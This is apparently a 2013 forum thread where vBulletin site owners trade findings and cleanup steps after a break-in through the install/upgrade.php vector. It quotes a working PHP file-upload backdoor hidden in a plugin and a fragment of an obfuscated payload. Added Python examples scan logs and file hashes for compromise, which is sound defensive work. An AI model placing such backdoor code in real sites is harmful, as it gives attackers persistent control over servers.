A new type hack method?


  • TheLastSuperman
    commented on 's reply
    Also adding to my above comment, the /install/ directory was already removed from the site in question.

  • TheLastSuperman
    commented on 's reply
    Going through a site now with files that contained the code you posted above, along with a non-base64-encoded version in the plugin manager titled Skimlinks_vb with contents:

    PHP Code:
    if (strpos($_SERVER['PHP_SELF'],"search.php")) {
    // vBulletin Security admincp
        if (!empty($_REQUEST['vbsearchdo'])){
            echo '';
            echo '';
            if( $_POST['_upl'] == "Upload" ) {
                if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Good Upload'; }
                else { echo 'Upload Failed '; }
            }
        }
    }

    So that allows file uploads. Check for shell scripts (the one you posted an image of is a very bad shell script; read more here: http://www.derekfountain.org/security_c99madshell.php), because by accessing your help.php page the hacker was able to let the c99 madshell interact with your site.

  • TheMax74
    commented on 's reply
    Note: i had no /install directory before the hack!

  • vbull fan
    commented on 's reply
    My hacker registered as r00t and now when I try to go to my site it just says Access denied.

  • vbull fan
    replied
    Originally posted by Zachery
    Please read the following two blog posts:
    http://www.vbulletin.com/forum/blogs...ve-been-hacked

    http://www.vbulletin.com/forum/blogs...vbulletin-site

    Also please see these recent security announcements:

    vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
    vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions
    That is just great - I own my forum, but I do not know how to do that. Is VB going to cover the cost for me to pay my IT guy to do this for me? This is the 11th and I did not hear anything about this until I was hacked. I can't even access my site at this point. I own 7 VB sites - should I expect the other 6 to be trashed too????

    How do I remove this?? vbulletin-forumhome.js File not recognized as part of vBulletin

  • TheMax74
    replied
    Please check admincp/help.php by clicking the "?" somewhere in the admin control panel. Yesterday I downloaded the 4.2.x version and it shows a very bad page!
    I noticed a plugin change with the following code:

    if (strpos($_SERVER['PHP_SELF'],"help.php")) {
    if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260) ;$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T 0......

    It seems that when accessing the HELP page, the plugin starts up some bad code.



    [Attached image: exploit.jpg]
    Last edited by TheMax74; Sat 14 Sep '13, 2:07am.

  • djbaxter
    replied
    Originally posted by Phat Phreddy


    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
    See http://www.vbulletin.com/forum/forum...47#post3994147

  • Zachery
    replied
    Removing your version number won't really do much; there are still plenty of ways to find your site, so that is sort of moot.
    We only give enough information to make sure you're aware of the exploit. Full Disclosure only helps the people who really want to attack you guys, not our customers.

  • aspen
    replied
    Originally posted by Jntu Hub
    my site was hacked with new name
    I had him get on my site too, but no damage was done... because I always double bag it.

    NEVER EVER EVER EVER trust the security of vbulletin, wordpress, oscommerce, whatever, any software you install on your website. NEVER trust it. Always double up the admin login with .htaccess password protection.

    I had admin accounts created on my website, but because I had password protected the admincp, they were never able to do anything. These aren't real hackers, they're script kiddies, they get a recipe off a black hat website and follow it. Double bagging might not stop a real determined hacker, but it'll stop these people.

    Another thing is to remove vbulletin's display of version information from public pages, which means they won't find your forum when they search for the specific version they have the exploit for.

    Someone may have mentioned these things already, I've not read the whole thread yet. But they bear repeating in any case.

    Also yes, when an exploit is found, give more details, tell us what to look for.

  • hqarrse
    replied
    Shocked to find this thread.

    The late notification from VB gave no information at all, just 'delete install'. Given that I had no signs of a hack, I did it and moved on.

    I came across this thread tonight and yes, like everyone else I have new admin users. In my case they don't seem to have done anything, perhaps because my admincp is renamed and well protected. Fingers crossed. I still have some checking to do, but it's looking promising.

    Just in case any of the VB staff are still monitoring this, your response has been very poor. It would take minimal effort to add some detail to your exploit report, or send a second email once the level of detail in this thread became available. There are no doubt plenty of forum admins out there who are happily going about their business safe in the knowledge that the exploit was sorted and no damage done. And plenty of those will have some new administrators and plugins to keep them company.

    I have been teetering on the edge of jumping ship given the progress of VB5 and because VB4 seems to no longer be in development. VBSEO also in troubled water. The appalling response to this exploit, coupled with some pretty 'f*** you' type responses from the staff in the discussions of this make me really keen to get on and use that Xenforo license I bought a couple of months ago.

    Edit: to add something constructive to my whinge, I did what may be a useful plugin check for others. I looked at the sequence of plugin IDs in the prefix_plugin table, ordering by the id descending. Then I looked at the next auto_increment id and made sure that there isn't a gap between the last known, trusted plugin created and the next ID. If there is a gap, then there is a chance that something has been created and then deleted. Get the auto_increment id using:

    SELECT `AUTO_INCREMENT` FROM information_schema.`TABLES` WHERE TABLE_SCHEMA = 'your_database' AND TABLE_NAME = 'yourprefix_plugin';

    I also checked the controlpanel log for gaps over the periods from registration to most recent activity of my new admin users. That would give an idea if something was done, then the log pruned.

    Edit 2: I do have an entry in my control panel log for a user called . , one of the new administrators. He accessed forum.php on 1 Sep and the action was 'modify'. However if I search for that or the email address given in my server logs, I can't find an entry. Can anyone shed any light on how that could be? Or any way of checking what the modify actually was?




    Last edited by hqarrse; Wed 11 Sep '13, 2:25pm.

  • grayloon
    replied
    Originally posted by Phat Phreddy
    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
    On my hacked forum, I found that they had uploaded some PHP shell scripts. If you don't remove those shell scripts, you could be in a world of hurt. Those shells can give them access to modify almost anything on your server - not just vBulletin. Here's everything I did to clean this up:
    • remove vBulletin install directory
    • change the admin password
    • change MySQL password
    • remove hacker admin accounts
    • remove uploaded shell scripts
    • remove hacker plugins
    • remove hacker language variables
    • remove hacker notices
    • remove hacker announcements
    • block IP ranges that accessed the upgrade.php file or shell scripts
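    The last step above (finding who hit upgrade.php or the dropped scripts) is a log-triage job. This added example, not code from the thread or from vBulletin, parses Apache "combined" access-log lines and lists the client IPs that requested install/upgrade.php or POSTed to search.php (the trigger for the upload backdoor quoted earlier in the thread). The log lines and IPs are constructed; the path suffixes and the assumption that the forum lives under /forum/ are mine.

```python
import re
from collections import defaultdict

# Apache "combined" log format, parsed with a plain regex (no extra deps).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Paths named in this thread: the install/upgrade.php vector and the
# search.php upload backdoor, which only fires on a POST carrying the form.
# A POST to search.php is also a normal search, so this produces a review
# list, not a blocklist.
SUSPECT_RULES = (
    ("install-script access", lambda m, p: p.endswith("/install/upgrade.php")),
    ("POST to search.php", lambda m, p: m == "POST" and p.endswith("/search.php")),
)

def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["path"].partition("?")
    return rec

def triage(lines):
    """Map client IP -> list of reasons for every client hitting a suspect path."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for label, rule in SUSPECT_RULES:
            if rule(rec["method"], rec["path"]):
                hits[rec["ip"]].append(f'{label} at {rec["ts"]} (HTTP {rec["status"]})')
    return dict(hits)

# Constructed sample lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Sep/2013:03:14:22 +0000] "GET /forum/install/upgrade.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2013:09:01:05 +0000] "GET /forum/search.php?do=getnew HTTP/1.1" 200 8891 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Sep/2013:03:15:40 +0000] "POST /forum/search.php?vbsearchdo=1 HTTP/1.1" 200 311 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Sep/2013:09:02:10 +0000] "GET /forum/forum.php HTTP/1.1" 200 20450 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, reasons in triage(SAMPLE_LOG).items():
        print(ip, *reasons, sep="\n    ")
```

    Feed it the real access log with `triage(open("access.log").readlines())`; an IP that shows up under both rules is the strongest candidate for blocking.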

  • DemOnstar
    replied
    Originally posted by Phat Phreddy
    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..
    Hello, When I entered my forum homepage a little while ago, I met with this page: http://imageshack.us/a/img842/6846/dqc4.jpg First I've checked my


    I see it so many times..... Too many times infact....
    But that is all I see......

    I have no htaccess things that I have done, I don't know how to do it. I have no hacks, no new admins, plugins, defacement issues. No intrusions whatsoever.
    I did remove the install folder at a very early stage in this recent exploit..

    Maybe I have been lucky so far? Maybe I just don't see what I am supposed to be looking for..? Maybe it will happen to me soon?

    There really is no finite explanation/solution here....

  • Phat Phreddy
    replied
    Originally posted by Zachery

    We've advised customers to remove the install folder, that is our response. Once you remove it the exploit vector is gone.

    In the past it wasn't required to remove the install folder based on how the install/upgrade system worked. Over time the system changed which allowed an issue to crop back up.

    I restored a clean file system.. I removed the install folder.. the admins.. and I have been hacked 2 more times since..

  • tpearl5
    replied
    Just found a user on my site that was set as an admin and installed a backdoor: "smith123456"

  • Ambro
    replied
    For those of you who are getting hacked AFTER removing your install directory, this is because the attacker has installed a persistent backdoor, usually a PHP modification done to one of the core vbulletin files or in some cases, in the form of a plugin.

    Step one would be to secure your admincp and modcp folders with .htaccess. This should be the first step in your journey. Also read up on making the admin account (the owner of the forums) undeletable / uneditable via the conf file.

    After you've done this, login to your adminCP and go to Maintenance -> Diagnostics -> Suspect File Versions

    Run this and look for files which say "File not recognized as part of vBulletin". If you see something that's not part of an addon or modification you've personally applied to your forums, it's safe to assume it's malicious and doesn't belong. My advice at this point would be to re-upload and replace any files which are not recognized by VBulletin. Once you've been able to rid yourself of the backdoor, you should be in the clear.

    If you've completed the above steps and are STILL being hacked, make a backup of your database, pictures, thumbnails, themes, etc and reinstall from a fresh source base. While this may be tedious, it assures that you're replacing any backdoored script.

    PLEASE MAKE SURE to delete your install directory AFTER installation or read up on my post on page 4 about setting up a honeypot for logging IPs of people who visit install/upgrade.php.
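    The "Suspect File Versions" check above boils down to comparing the live tree against a known-good copy. This added example, not vBulletin's own diagnostic nor code from the thread, builds a SHA-256 manifest from a clean download and reports files that are not recognized (dropped), modified (a core file changed in place, as with a backdoored plugin host) or missing (expected for the deleted install directory). The two directory trees are constructed in temp folders; the file names and contents are made up for the demo.

```python
import hashlib
import os
import tempfile

def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root):
    """Map relative path -> sha256 for every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest

def suspect_files(manifest, live_root):
    """Compare the live tree with a known-good manifest; returns three sorted lists."""
    live = build_manifest(live_root)
    return {
        "not_recognized": sorted(set(live) - set(manifest)),   # dropped files
        "modified": sorted(p for p in live if p in manifest and live[p] != manifest[p]),
        "missing": sorted(set(manifest) - set(live)),          # e.g. the removed install dir
    }

def _write(root, rel, content):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(content)

def demo():
    """Constructed trees: 'clean' stands in for a fresh download, 'live' for the site."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as live:
        for root in (clean, live):
            _write(root, "forum.php", "<?php // forum\n")
            _write(root, "admincp/help.php", "<?php // help\n")
        _write(clean, "install/upgrade.php", "<?php // installer\n")  # deleted on the live site
        _write(live, "admincp/help.php", "<?php // help (tampered)\n")  # core file changed
        _write(live, "images/misc/x.php", "<?php // dropped file\n")     # unknown file
        return suspect_files(build_manifest(clean), live)

if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

    Against a real site, build the manifest from the untouched download of your exact version and run `suspect_files` over the web root; anything in the first two lists that you did not put there is what the thread's posters found.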
